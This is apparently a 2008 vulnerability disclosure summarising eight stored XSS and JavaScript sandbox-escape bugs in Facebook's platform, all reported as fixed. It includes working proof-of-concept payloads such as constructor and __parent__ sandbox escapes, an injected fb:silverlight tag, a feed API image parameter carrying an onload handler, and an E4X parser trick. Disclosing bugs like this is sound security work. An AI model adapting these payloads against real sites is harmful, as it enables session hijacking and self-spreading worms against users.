Facebook stored XSS vulnerabilities

This is a summary of various Facebook security issues (script injection, persistent XSS) found and reported since June 16, 2008. As of July 4th, 2008, all of them have been fixed.

Any of these could be exploited to take over the victim’s web browser temporarily to e.g. read inbox messages, forcibly install Facebook applications, manipulate friend lists, post messages as the victim user, etc. Any of these would also allow creation of a virus/worm.

Most of the issues require the victim user to click on a profile box or visit a canvas page of an application in order to trigger the injected JavaScript. Issues 2) and 3) trigger the JavaScript without mouseclicks.

The vulnerabilities were tested with two browsers: Firefox 3 (Linux + Windows) and Internet Explorer 7.

1) Escaping JS sandbox with literal Function constructor reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF, IE
Description: The JS sandbox denies references to Function.constructor but using a literal such as “function f() { }” in the code and refering to its constructor with the “bracket syntax” was possible. The example below uses this method and calls the constructor with a string argument, then calls the resulting Function object.
Reported: June 13, 2008
Fixed: yes
Example:

   (function f(){}["constructor"]("alert('any javascript here');"))();

2) Fb:silverlight JS injection

Impact: execution of unrestricted JS on canvas pages, profiles
Browsers: FF, IE
Description: Pretty simple XSS, described here.
Reported: June 16, 2008
Fixed: yes
Example:

  <fb:silverlight silverlightsrc="a"
   width="\" height=",any_javascript_code_here);//" />

3) Injecting JS in Feeds

Impact: execution of JS when viewing Feeds on profile page or the “home” page
Browsers: FF, IE
Description: Insufficient input validation in the publishTemplatizedAction API method. This allowed execution of sandboxed JS, so one of the sandbox-escaping techniques have to be used in order to exploit this practically.
Reported: June 16, 2008
Fixed: yes
Example:

  # using the perl API

  $facebook->feed->publish_templatized_action( title => "My Title",
        title_template => "{actor} is testing feed stories",
        body_template => "hello",
        image_1 => "http://www.mysite.com/image.gif'\" onload=(function	f(){}['constructor']('alert(1)'))();",
        image_1_link => "http://www.mysite.com" );

4) Escaping JS sandbox with literal Number reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: Using the “bracket syntax” to reference the __parent__ property of a floating point number to get a Window object reference, then calling its eval() to run arbitrary code. IE doesn’t support the property.
Reported: June 18, 2008
Fixed: yes
Example:

   <script>
   1.["__parent__"].eval("alert('any javascript here');");
   </script>

5) Injecting JS in video attachments

Impact: execution of unrestricted JS when a inbox, wall or forum message is viewed (mouseclick required)
Browsers: FF, IE
Description: When sharing video content with the http://www.facebook.com/sharer.php form, some input fields can be modified e.g. with JavaScript. The example below can be typed in the address bar to inject JS in a message.
Reported: June 20, 2008
Fixed: yes
Example:

  javascript:f=document.forms[0];f['attachment[params][src]'].value='#" a=b><img src="#" onerror=alert("hello")>

6) Escaping JS sandbox with E4X

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages). Works in browsers supporting E4X (Firefox)
Browsers: FF
Description: JS parser in browsers supporting E4X understand XML, which can contain multi-line strings. Facebook’s JS sandbox technology didn’t expect XML and multi-line strings. The example below demonstrates how this could be used to fool the sandbox logic.
Reported: June 26, 2008
Fixed: yes
Example:

   <script>
   <x x="
   x" {alert('any javascript')}="x"
   />
   </script>

7) Escaping JS sandbox with literal String reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a String object can be referenced using a literal expression and the “bracket syntax” to get a Window reference.
Reported: June 21, 2008
Fixed: yes
Example:

   "a"["__parent__"].eval("alert('any javascript here');");

8) Escaping JS sandbox with literal RegExp reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a RegExp object can be referenced using a literal expression and the “bracket syntax” to get a Window reference.
Reported: June 21, 2008
Fixed: yes
Example:

  /a/["__parent__"].eval("alert('any javascript here');");